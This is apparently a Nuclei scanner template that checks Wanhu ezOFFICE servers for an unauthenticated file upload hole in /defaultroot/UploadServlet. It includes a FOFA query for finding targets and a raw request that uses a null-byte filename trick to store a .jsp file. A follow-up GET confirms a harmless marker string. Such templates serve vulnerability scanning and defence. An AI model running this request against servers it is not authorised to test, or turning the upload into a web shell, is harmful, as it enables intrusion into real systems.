id: wanhu-ezoffice-uploadservlet-file-upload

info:
  name: Wanhu Ezoffice File Upload2 Vulnerability
  author: zp857
  severity: critical
  tags: wanhu-ezoffice,fileupload
  metadata:
    fofa-query: 'app="万户网络-ezOFFICE"'

requests:
  - raw:
      - |
        POST /defaultroot/UploadServlet HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 127.0.0.1
        Content-Type: multipart/form-data; boundary=---------------------------f6f5e12ed2e08256

        -----------------------------f6f5e12ed2e08256
        Content-Disposition: form-data; name="path"

        loginpage
        -----------------------------f6f5e12ed2e08256
        Content-Disposition:form-data;name="fileId"

        123456.jsp{{url_decode("%00")}}.jpg
        -----------------------------f6f5e12ed2e08256
        Content-Disposition: form-data; name="img"; filename="aaa.txt"
        Content-Type: text/plain

        ceshi010
        -----------------------------f6f5e12ed2e08256--

      - |
        GET /defaultroot/upload/loginpage/123456/123456.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ceshi010"

      - type: status
        status:
          - 200